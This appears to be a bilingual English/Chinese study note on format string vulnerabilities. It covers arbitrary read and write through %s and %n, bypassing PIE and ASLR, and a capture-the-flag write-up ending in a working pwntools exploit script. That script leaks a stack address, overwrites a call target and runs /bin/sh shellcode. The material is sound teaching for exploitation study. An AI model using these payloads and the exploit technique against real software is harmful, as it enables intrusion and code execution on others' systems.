1. Vulnerable function

int printf(const char *format, …) : 将格式化输出到标准输出（stdout）
int fprintf(FILE *stream, const char *format, …) : 将格式化输出到指定的文件流
int sprintf(char * str, const char *format, …) : 将格式化输出到字符串缓冲区
int snprintf(char *str, size_t size, const char *format, …) : 将格式化输出到字符串缓冲区，同时限制写入的字符数
void syslog(int priority, const char *format, …);
int vprintf(const char *restrict format, va_list ap);
int scanf(const char *restrict format, …);
int sscanf(const char *restrict str, const char *restrict format, …);

2. Prebuilt functions of format string

%p - take argument as a pointer and print it
%s - take argument as a pointer, dereference it, print array of chars
%x - take argument as integer and print it in hexadecimal
%n - The number of characters written so far is stored into the integer(4 bytes) pointed to by the corresponding argument.
- %n 不会直接输出数据，而是将已经输出的字符数写入到其对应参数指向的内存地址中。
- 需要传递一个指针作为参数，这个指针指向一个 int 类型的变量，用来存储字符数。

3. Argument

the first six arguments are pass by registers, and store in stack
the number seven argument, they push on at the stack.
%6$p : print the dereferrence data of rsp, which means the first data in stack
%9$p : print the fourth data instack

4. Stack picture

How does printf know the number of arguments
stack
the argument is going to be before the return address, it would be rbp+16, rbp+24.

5. Arbitrary read

deduction
- %s will interpret 0x4141414141414141 as a pointer to a string and attempt to dereference it. It will then output the content at that memory location until it encounters a \0 (null terminator).
- 如果我们把AAAAAAAA换成地址, 对应的%p换成%s, 理论上就能输出指定地址指向的内容。
payload : ‘\x12\x34\x56\x78\x00\x00\x00\x00 %s’
- 这个payload是没用的，因为printf会打印字符串直到遇到’\x00’结束，这样’%s’就不会被传入。
- 所以我们要交换输入地址和%s的位置
switch the position of address and “%s”
payload: %p%p%p%p%p%p%p%sAAAABBBB - it should work!
- 如果我们把AAAAAAAA换成地址, 对应的%p换成%s, 就能输出指定地址指向的内容。
- 因为输入地址和格式化字符串位置交换，格式化字符串先放在堆栈上，后面跟着地址，需要考虑padding，该情况下此处多加1个%p.
“%{n}$p” payload
- 把第n个$p的值打印出来,这个例子打印的是第7个$p对应的值(n从0开始), 也是栈上的第一个值，也是rsp的值。
padding
- 栈是8字节对齐

6. Arbitrary write & arbitraty bytes

arbitrary write
- %n + 地址
  把目前输出的字符个数写到地址指向的空间, %n对应的是4个字节。
arbitraty bytes
- %hhn: write one byte
- %hn: write two bytes
- %lln: write eight bytes
control what we are writing
- payload : AA……AAAAA %n \x78\x45\x34\x12
  问题1：如果要写的值非常大，payload就会非常长，程序不一定能读取到这么长的payload。
- 解决办法1 : %{n}c : 设置输出字符总宽度为n,左边用空白字符填充。即实际打印出n个字符。
```
printf("%50c", 'A');
```
  %50c: 输出一个字符，并在字符前面填充 49 个空格（总宽度为 50）
  问题2 : 如果要写的值非常大, %{n}c的n的值就要非常大，导致输出空白字符非常多，受计算机性能的影响，计算机可能会炸掉。
- 解决办法2 : Chaining together multiple small writes
  - payload
  - overflows

7. Where can I write

PLT / GOT
Function ptrs, jump tables
C libc hooks (__malloc_hook, __free_hook, etc)
dtors : 在程序退出时, 用于清理全局资源或执行一些退出操作
__atexit handlers : 程序退出时执行注册的清理函数
vtable : 是一个虚函数表，用于实现多态性

8. Protections

Stop you corrupting memory
- Stack canary
- …
Stop you gaining code exec after memory corruption
- ASLR/PIE Randomisation
- NX
- …
bypass
- pwn checksec <binary_name>
- ASLR : 系统层面地址随机化(stack, heap 等会整体偏移)
  - bypass : leak an address
- PIE ：binary层面地址随机化(main, global variable 等会整体偏移)
  - bypass : leak an address

9. Exploitation

找到输入地址在栈中对应的位置
- AAAABBBB %{n}$p
交换payload字段位置, n+1, 增加padding
- %{n+1}$p…. AAAABBBB
  如果{n+1}为1位, 4个.
  如果{n+1}为2位, 3个.
  以此类推
arbitrary read
- %{n+1}$s…. 要读的地址
arbitrary write
- 要写的地址值按字节分割存放成数组
- 依次对目标地址写入目标值
  - %{x}c%{n+int(padding/8)}$plln%{y}c%{n+1+int(padding/8)}hhn<addr1+1>…
- 以字符串形式打印目标地址存放的指针指向的值
  - - %{n+int(padding_total_bytes/8)}$s
format_exploit_generator.py:
def fmt_address_write_payload(hex_written_address, arg_number_i, padding_total_bytes, written_address_location):函数已实现该功能
- hex_written_address : 需要被写入的地址值
- arg_number_i : “AAAABBBB %{n}$p"中n的值
- padding_total_bytes : padding值
- written_address_location : 被写入的位置

10. 例题分析

1.在此分享一道题：spooky，其中涉及的知识点有PIE, fmt_vuln, 和 shellcode。首先我们看下函数调用栈: main() –> loop()以及关键函数loop()，由图可知loop()函数没有任何ret指令，只有一条call指令。要改变程序的执行路径，只能从call指令做文章，方法之一是把call跳转的地址指向shellcode地址。 spooky_overview Image

2.binary开启PIE保护。需要bypass PIE protection。 spooky_checksec Image

3.存在fmt_string vulnerability。输入buffer在rbp-0x110处。 spooky_checksec Image

4.解题思路：

Bypass PIE: 因为函数调用栈是main() –> loop()，可以利用格式化字符串漏洞打印rbp_main在内存的地址 : “%6$p"打印的是loop()函数在栈上的第一个地址，loop栈大小为0x120，loop栈之下地址是rbp_main，故”{6+int(0x120/8)}$p"打印rbp_main值，进而推出栈任意地址。
shellcode存放：binary没有shellcode代码，所以shellcode是需要我们输入的，我们可以把shellcode存放在input_buffer的底部位置：shellcode_location = rbp - 0x45
调用shellcode
- 全局binary只有一个call指令能调用函数，调用的是存放在[rbp-0x110]位置内的值，所以我们需要把shellcode地址存放在[rbp-0x110]位置。
- 那么如何才能把shellcode地址写进[rbp-0x110]位置呢？fmt_string vulnerabilty 可以任意地址写。故我们只需要在input buffer中放入fmt_payload + 垃圾字符 + shellcode，当出发fmt_string漏洞时，shellcode地址被写入[rbp-0x110]并且shellcode也被写入内存，再调用call指令，程序跳转并执行shellcode，获取系统shell权限。

5.Exploitation：

from pwn import *
from format_exploit_generator import *

context.endian = 'little'
context.arch = 'amd64'

'''
1.Leak rbp_main and Calculate printed address location, becaure salutations function will execute the address
stored in printed address location.
2.In input function and print function:
fmt_payload : overwrite shellcode address to printed address location.
exp_payload = fmt_payload + padding + shellcode
3.Run salutations function to execute shellcode
'''


'''
fmt_vuln entry point: 8: AAAABBBB 0x4242424241414141
'''
# outputs = []
# for i in range(100):
#         p = process('./spooky')
#         p.sendlineafter(b"$ ", b"i")
#         payload = f"AAAABBBB %{i}$p"
#         p.sendline(payload)
#         p.sendlineafter(b"$ ", b"p")

#         fuzz_message = p.recvuntil(b'\n', drop="True").decode('utf-8')

#         outputs.append(f"{i}: {fuzz_message}")
# for output in outputs:
#     print(output)

# p.sendlineafter(b"$ ", b"i")
# p.sendline(b"AAAABBBB %6$p")
# p.sendlineafter(b"$ ", b"p")






p = process("./spooky")


#shellcode: pop a shell
shellcode = asm('''

mov rax, 0x0068732F6E69622F /*push '/bin/sh\x00*/
push rax

mov rdi, rsp

mov rsi, 0
mov rdx, 0

mov rax, 0x3b
syscall

''')
#shellcode_len : 37
print("shellcode_len: ",len(shellcode))



'''
leak rbp_main address
Calculate rbp_loop, printed address location and shellcode_location
'''
p.sendlineafter(b"$ ", b"i")
payload = f"%{6+int(0x120/8)}$p"
p.sendline(payload)
p.sendlineafter(b"$ ", b"p")
rbp_main = int(p.recvuntil(b'\n', drop="True").decode('utf-8'),16)
print("rbp_main: ", hex(rbp_main))

rbp_loop = rbp_main - 0x10
printed_address_location = rbp_loop - 0x118
shellcode_location = rbp_loop - 0x45


'''
Generage fmt_payload and exp_payload
fmt_payload: overwrite shellcode_location to printed_address_location
exp_payload: fmt_payload + shellcode_payload
'''
p.sendlineafter(b"$ ", b"i")
fmt_payload = fmt_address_write_payload(shellcode_location, 8, 128, printed_address_location)
exp_payload = fmt_payload + b'\x90' * (0x110-0x45-len(fmt_payload)) + shellcode
p.sendline(exp_payload)
p.sendlineafter(b"$ ", b"p")

'''
Execute pop a shell function
'''
p.sendlineafter(b"$ ", b"s")



p.interactive()
p.close()